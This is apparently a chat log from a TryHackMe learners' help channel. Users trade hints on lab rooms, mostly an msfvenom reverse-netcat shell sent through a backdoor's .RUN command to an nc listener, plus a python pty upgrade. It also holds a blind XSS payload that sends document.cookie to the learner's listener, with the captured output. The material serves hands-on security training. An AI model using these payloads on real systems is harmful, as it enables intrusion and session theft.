So, the question for Network Services: "Based on the title returned to us, what do we think this port could be used for?"

I've run the standard nmap enumerations that I have gone through, but they all basically say the same thing. I'm not seeing a title

LOL I WAS LEGIT GONNA SEND THIS RIGHT NOW

like i jut now went here and was bouta ask the exact same thing

well now you know that the open port is 8012

there are a couple of ways of doing this

wait no scratch that XD

I can only think of one. I'm not at my vm atm lol

nmap -sV -p 8012 10.10.154.248

That's a version scan

I believe that will give more information

I tend to use -sC -sV. -A is also a good option

these can be slow so doing -T4 is a good choice (second fastest time template)

let me know if there's something that doesn't make sense and I'llt ry my best to explain :)

(Running scan now) - but yeah, that makes sense once you saaay it.. lol

this stuff can be a bit overwhelming at first but it's some awesome flags to add to your nmap arsenal ;)

Thank you! - I'm still a little confused by the results, but it was enough to get through the last questions for the task!

Gave +1 Rep to @dry gate

you can always ask! ;)

glad you got through the task :D

what title is it supposed to return?

if you look at the "* ********" and that's part of the hint. it says it over and over inside the output

|| PORT STATE SERVICE REASON VERSION
8012/tcp open unknown syn-ack ttl 64
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8012-TCP:V=7.60%I=7%D=11/13%Time=61903B07%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2E,"SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20view\x20comman
SF:ds\n")%r(GenericLines,2E,"SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to
SF:\x20view\x20commands\n")%r(GetRequest,2E,"SKIDY'S\x20BACKDOOR.\x20Type
SF:\x20.HELP\x20to\x20view\x20commands\n")%r(HTTPOptions,2E,"SKIDY'S\x20B
SF:ACKDOOR.\x20Type\x20.HELP\x20to\x20view\x20commands\n")%r(RTSPRequest
SF:,2E,"SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20view\x20commands
SF:n")%r(RPCCheck,2E,"SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20vie
SF:w\x20commands\n")%r(DNSVersionBindReq,2E,"SKIDY'S\x20BACKDOOR.\x20Type
SF:\x20.HELP\x20to\x20view\x20commands\n")%r(DNSStatusRequest,2E,"SKIDY'S
SF:\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20view\x20commands\n")%r(Help,2
SF:E,"SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20view\x20commands\n"
SF:)%r(SSLSessionReq,2E,"SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20
SF:view\x20commands\n")%r(TLSSessionReq,2E,"SKIDY'S\x20BACKDOOR.\x20Type
SF:x20.HELP\x20to\x20view\x20commands\n")%r(Kerberos,2E,"SKIDY'S\x20BACKD
SF:OOR.\x20Type\x20.HELP\x20to\x20view\x20commands\n")%r(SMBProgNeg,2E,"
SF:SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20view\x20commands\n")%r
SF:(X11Probe,2E,"SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20view\x20
SF:commands\n")%r(FourOhFourRequest,2E,"SKIDY'S\x20BACKDOOR... etc ||

Sorry... not sure how to mark standard text as a spoiler..

use two pipes | around the spoiler message :)

Now I'm stuck with the msfvenom portion... any thoughts? I've got the tcpdump running ok... I can .RUN the ping... but the msfvenom part doesn't appear to react

Oh hey, thanks again.

Gave +1 Rep to @dry gate

msfvenom is a command used to create malicious code. Run it on your machine and it will give you the payload (malicious code). That's what you want the victim machine to run :)

so... run it local and not through the telnet? hmm

That room introduces a bunch of new things and I found it pretty confusing

exactly

I think I'm missing something here. I'm about to run out of time on the machine anyway - I'll come back to this in a while and see if my brain can recover enough functionality for a re-do.

under network services... I am trying to use ssh2john to convert the rsa key i got with get... it is saying id_rsa_scott has no password.

i just ran it throught the local terminal with the only thing different being the lhost=[The local machine's ip]

I will cat id_rsa_scott

are there other requirements in the file. I just used sublime text

idk if thats what ur talking about but try ssh -i id_rsa [username]@[ip]

i havent cracked it yet

what task is it?

in network services in complete beginner

oh so does the msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R line open a port or something of that sort?

to recieve the files or something?

have you checked the txt file what it said?

i havent cracked the password

you dont need to

dont i need to do that to get to the next step.....

oh

because you have the private key

you can log in using private keys directly you still need the ip and username tho

ok but im still curious about cracking it

i feel like i shoul dbe able to if i have the private key

im pretty sur you cant because the "Company" in the context just gave the private key and probably only they know the password, idk if its possible to crack or not but its not the point of that module

however im not that experienced to really know in detail

hmm im not sure

@dry gate ^

It means that there's no passphrase, right? So there's nothing to crack. You can just use the rsa key to ssh in as the user without it prompting your for a passphrase.

It gives you a payload (malicious code) that will do that yeah. You get it to execute on the victim machine and it will send your machine a reverse shell on port 4444. Then on your machine, you listen on that port and BOOM you get a reverse shell

how do you execute the payload on the victims mchine tho?

And that's where I'm stuck, too. lol

lmao were same on the same boat stuck on the same things since prob start of day

I think the idea is that once we open up the .RUN ping [local THM ip] -c 1, you can see the ICMP traffic over tcpdump. I thought that we should run msfvenom on the machine that we have the reverse shell on... but I must be missing something

well i already got to the part where we have the payload and i just need to see how to execute it

idk how tho and cant find it

i found the payload to be mkfifo /tmp/fbomtyz

so i figured i needed to do .RUN -p mkfifo /tmp/fbomtyz lhost=[the local ip i have] lport=4444 R

but i dont have anything on the listening port

Yeah, you're a step ahead of me... I must be missing what mkfifo is to begin with.

i just ran the msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R on the local machine

dont forget to change the [local tun0 ip] with the actual ip tho @tardy pumice

local ip that is

(I'm having to go back through it to get to that question again)

i can screenshot the answears i put on top if u want

I'm using this self abuse as training lol - but I was trying to do some things and forgetting.. meh - long day!

and i found how to do the end i was trying to do the command like they said so "msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R" but you actually just had to run the payload that it gave you from the output as a command

(for the last question)

Yeah, the .RUN? Man... I feel like I was there.. but where did mkfifo come into it?

wdym? where did it go?

I'm probably just reading something wrong

what question are you on rn?

I'm currently screwing up the login to telnet with 'telnet skidy@10.10.204.61 8012

oh you dont need the @ and whats before

only the ip and port

palm-face

Thanks!

Gave +1 Rep to @upbeat badger

cause you cant know what his username is in advance

you only knew it after you got in

wait nvm

Well, it was in the "nmap -sV"

yeah i remembered

yeah but still thats all u need

i made a floppy word doc with all the usefull things i learnt for linuxfrom the start

I've been chicken-scratching it heh

OH That's where you got mkfifo, I was executing the msfvenom from the remote machine before.

yep

and that output is the command and i wasnt able to figure it out lol

Yeahhhhhhhhh.. it's a head-scratcher.

@tardy pumice i did manage to complete it so if ur stuck u can ask for help

I'm trying to run with the payload we found before, but I get nadda trying to run it after .RUN msfvenom -p.. like you showed above

Maybe a hint? lol

i was stuck at it too but ill say that the payload outputted by you running msfvenom -p cmd/unix.... isnt a payload but rather a command with the payload inside

oh finally we get to learn a little bit of hydra

Yeahhh, am I close?

huh, it almost looks like that tmp/mxqtv was 'rm' and that the shell might be in the .. "/bin/sh"?

Eh not really, here ill try to say it better the output you got here is not only a payload its a command, a command which has the proper ip,port and payload to send something to you (when you are listening to the port 4444)

idk if im just saying it in a not very clear way

Yeah, I have nc listening through "nc -lvp 4444"

yeah and that should be in a separate terminal

So far, so good... just can't figure out the command that will launch .RUN msfvenom yadda-yadda

alright ill give you another tip

the command doesnt have msfvenom -p in it

Well crap. I need to run. Thanks though

want the answer before u go?

lol, sure, while you have it 😄

Need a littl help please!

I'm working on the cross-site scripting room: https://tryhackme.com/room/xssgi

I'm on the last questions of the last section, Task 8 - Practical Example - (Blind XSS)

In a terminal window I start a netcat listener:

nc -lvnp 4444

In the browser I enter the following into the body of the IT ticket, with a title of Test:

</textarea><script>fetch('http://10.6.108.24:4444?cookie=' + btoa(document.cookie) );</script>

Output from Netcat listener:

$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.6.108.24] from (UNKNOWN) [10.6.108.24] 40402
GET /?cookie=c2Vzc2lvbj0wZmQxMmRmYWYxMzU4MTI4YmU3MGI1M2M3OGFhZGIyZg== HTTP/1.1 <---- cookie
Host: 10.6.108.24:4444
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.124.19/customers/tickets/3
Origin: http://10.10.124.19
DNT: 1
Connection: keep-alive

The cookie above: cookie=c2Vzc2lvbj0wZmQxMmRmYWYxMzU4MTI4YmU3MGI1M2M3OGFhZGIyZg==

this is in base64 encoded, and here is my question. What part of the cookie is the cookie? Is it the entire string after 'cookie=' ? does it include the '==' ?

I've decoded everything between the = : c2Vzc2lvbj0wZmQxMmRmYWYxMzU4MTI4YmU3MGI1M2M3OGFhZGIyZg

                                        session=0fd12dfaf1358128be70b53c78aadb2f

Then I tried: c2Vzc2lvbj0wZmQxMmRmYWYxMzU4MTI4YmU3MGI1M2M3OGFhZGIyZg==

                                        session=0fd12dfaf1358128be70b53c78aadb2f

You can see the output for each is the same.

The last question asks:

 What is the value of the staff-session cookie?

I entered "0fd12dfaf1358128be70b53c78aadb2f" (without quotes), but it said the answer was wrong. I also tried the entire

session=0fd12dfaf1358128be70b53c78aadb2f, but was given a wrong answer on that also. not sure what I'm missing here!

on rootme here is where im at.

there are the results of my gobuster

how do i know which one is hidden, as the question asks?

the answer is /panel but i only know that because it gives me the hint of how many letters the answer is

hidden might be the wrong way to phrase that question, but why cant the answer be uploads, etc... should i just know the other ones listed arent a directory?

i think "hidden" is just a bit of fluff in the room to point you to the next step - given that the hint text is /*****/ you should be able to work out which directory they're looking for

right.. gotcha.. just wanted to make sure there wasnt some tool or something i should have known

hello, I'm doing the Linux Fundamentals Part 3 and I am stuck on the automation section regarding the "cron" cmd. The last question is asking "when" the cmd occurs. Aside from the cmd that it gave me to demonstrate, I'm lost as to how to find a scheduled task. Can anyone help me?

what have you tried so far? do you know where cronjobs might be stored?

I've already inputted a couple of things and have gone to the https://crontab.guru/ site to verify what the only code I was given. I suspect that I should be able to view the processes which would give me the answer but I'm not even sure what to ask the googlez

am I looking for a way to find an automated process that already exists?

you just need to find how to look at the cronjobs on the system - have you looked at /etc/crontab? or crontab -l ?

no but yes. Crontab -l tells me all the processes. looking at /etc/crontab now

i just booted the box - i think you might already be looking at the answer. what is the question asking you?

Its asking "when will the crontab on the deployed instance (IP address) run?"

Im trying to paste the screenshot to show what I see

right, and you said you've already looked at crontab -l - what was in there?

it shows text like I would edit in crontab -e

but its non editable

"# Edit this file to introduce....blah blah."

yeah but what's the text? what is it telling you, why would you look at crontab -l?

if I scroll down I can see there was already a cmd there "@reboot /var /opt/process.sh"

right, so that is a cronjob definition

when will that cronjob run?

thats what I'm trying to figure out.

it doesn't show any time, not even a " * * 2 * 3" like the demonstration shows

or rather "* 12 * * *"

no it doesn't, but it still has the same structure - some time thing, then a command

so if I was to break down the cmd thats there "@reboot"= reboot, "var/opt/process.sh"= the location of the processes being rebooted

is "@reboot" the key?

I'd assume that time would be there as the columns show the "m h dom dow command" but theres no time

try a google - crontab @ reboot

i know it's annoying to help like this but i don't want to spoil it for you, and you're 99.99999999999% there already

oh my god, first result explained it.

Thank you so much. I thought I was having a technical glitch

its just one of those "think about what it says, not what you think it says" things

Im shaking my head right now. This is why I love and hate the technical stuff. Thank you so much 🙂

no worries at all

Through the telnet session with .RUN :)

I'm still working on that one (Network Services, Task 7) I can't figure out what I'm supposed to do to "inject the payload"...

running the msfvenom command on your machine gives you something that starts with "mkfifo", right?

Yuuup

that's the payload (malicious code)

it basically says "connect to that machine on that port and give them a shell"

You can execute commands on the target machine in that telnet session. It says that you can do that with .RUN <command>

so

.RUN mkfifo ....

Is the target machine executing that command. It says "I'm going to send that machine a shell on that port" (you specified the IP and port when making the payload with msfvenom)

But you need to open that port that they're sending that shell on

I have nc listening on 4444

The target machine sends it to port 4444 for example. If that port on your machine is closed then it won't work

ah

I've .RUN the entire string they give... I've tried to come up with variations.. not really making a difference and there's no feedback

hmmm

I'll go through that task now

Hrm, I've tried just straight copy/paste and I've tried typing out the entire string. Just kinda hangs there.

I'm assuming my payload is off.

the msfvenom command?

or the mkfifo command?

hmmm

I mean, it's generating the payload... but then when I try to get the string to run on the remote it just hangs out.

Oh... wait... connection...? that's new. Is that it?!

ah yeah

oh frick, that was it...

that's it XD

I didn't notice that either at first XD

SO CLOSE, HOW DO I OPEN?!?!!? maaaaaaaaaaan

?

How do you open what?

So, I'm supposed to open the flag.txt.

yes

I did ls... and I can see it.

cat flag.txt no?

Tried more... less.. cat... then I started just throwing help commands out there

try ls -l

ls -l

is it to do with permissions

or can you just not use those commands?

The reverse terminal just appears to be sitting there now. hrm.

ah

yeah reverse shells are really flimsy

python -c 'import pty; pty.spawn("/bin/bash")'

I think that should stabilise it somewhat

yeah if your reverse shell has soiled itself, you can just set up the netcat listener again and execute the mkfifo payload in the telnet session

Dang. Well, that was as much time as I could spend this morning, gotta run.

gotta... .RUN

ha..ha.....ha -__-

Thanks! I appreciate it, I'll tackle it later

Gave +1 Rep to @dry gate

okok take care man :)

Ahhh - IC what ya did there ^^

Hi guys, I have a problem in the Kanobi room. When I use the command "mount machine_ip:/var /mnt/kenobiNFS" I get "mount.nfs: requested NFS version or transport protocol is not supported".
I’ve tried googling but I can’t find any solutions. Can you help me?

kenobi*

yea i figured that out i didnt know that you just had to copy paste the line

Did you create the kenobiNFS directory in the mnt folder first? If that's not the issue, try to install nfs-utils

hey guys. I've come across XML-RPC, and I'm wondering what should be the best alternative to Burp Collaborator so I can generate the payload

So I just finished the SSRF room but I want to understand why does using x/../ bypass the ip block when changing the avatar?

thx bro

Gave +1 Rep to @left thunder

Can someone give me a hint with wonderland, i'm on rabbit right now and i'm not sure where to go, i ran strings with the teaParty file and I know it has something to do with date but idk what to do from here

Can anyone help me for room #908828816393244742v4 any hint for privesc

Did you notice anything strange about how the date is called?

Have you checked out the room channel?

No

Not sure

That wasn't for you :p

How can i escalate priviledge

Sorry I haven't done that room yet, look in #908828816393244742, there may be some hints in there

Okk thanks 🙂

Gave +1 Rep to @ripe hedge

a binary

well, yes, but what else

think about exactly which binary will be called

i’ll need to look when i’m at my pc again, just woke up

no worries

quick question

I have been searching for an hour but to no avail

any hints?

The answer is the name of this icon

I can't say more without spoiling the whole answer

alright thanks

anytime

wait

should i leave the answer here?

or do i better not

It's better not to

alright

its tricky one, windows webpages got the answer

O.o

was about to try and answer but someone's question was deleted

Upload Vulnerabilities Task 7, I run the following which should be listening to ANY but lists 0.0.0.0? I receive no read out when loading the page. nc -nlvp 1234
Listening on [0.0.0.0] (family 0, port 1234)

Mine always shows 0.0.0.0 so I don't think it's the issue

sorry about that man, I figured it out and thought it's a silly question 😄

But thank you!

Gave +1 Rep to @dry gate

tell us more so we can try to help

no worries man! I'm glad you figured it out :D

0.0.0.0 as an ip address means global.... i.e all ip addresses are being listened on for said port

On the Junior pentester pathway, Burp Suite: Intruder
Task 11
Configure an appropriate position and payload (the tickets are stored at values between 1 and 100), then start the attack.
You should find that at least five tickets will be returned with a status code of 200, indicating that they exist.

Why am I only getting status code 302 on all 100 numbers? I intercepted the request sent when clicking on a ticket, and changed the position to Referer: http://10.10.205.193/support/ticket/§numbers§

Did you capture a request while being logged in?

Yes, I even tried capturing a request to each of the three tickets.

Could you send a screen of the request you send to intruder?

I just shut down the pc for the night. Can I pm you tomorrow if it's still an issue?

Ye, but I guess it would be better if you just ask the question in here and include the screen, so in order for someone else to reply to it to. But you can just tag me in that channel message then if you want.

Maybe a silly question - When one of the rooms is asking you to 'perform a thorough scan' in nmap... is there any way to do it where it doesn't take 20m+?

you can use rustscan
https://github.com/RustScan/RustScan/wiki/Installation-Guide

essentially, you pull this program to run in a docker container. make an alias for the command, then use it as rustscan <targetIP>

1. docker pull cmnatic/rustscan:debian-buster
2. alias rustscan='docker run -it --rm --name rustscan cmnatic/rustscan:debian-buster rustscan'

takes 20minute scans to under a minute

Whoa! Yeah, it might take a bit to get a handle on the syntax, but thanks!

Gave +1 Rep to @glass eagle

it will do a portscan, then take those results and throw them into nmap. you can add nmap parameters as well. just checkout the github

Ok thanks! I've added to favorites.

I need a lil starting hint, i cant find a point of entry, ive tried etneral blue and stuff and CVE:
2018-0886 cant get a hit on either

https://tryhackme.com/room/relevant#

Sometimes admins forget to set permissions or do they?

uhhhh

yes

Yo, still stuck?

Yes

You found a share?

nope

ill do that now

What ports are open on the machine?

port 80 open, http Microsoft IIS httpd 10.0
135 open Microsoft Windows RPC
139 open SMB Microsoft Windows netbios-ssn
445 open
3389 open

nt3wrksv looks hella sus.

See if you can access it.

that maybe sounds like #room-help and not hint, though I might be wrong

Also what's on port 80, try visiting it using your browser 👀

fuck off you legend

you some

big brain

Let's move to #room-help

nononon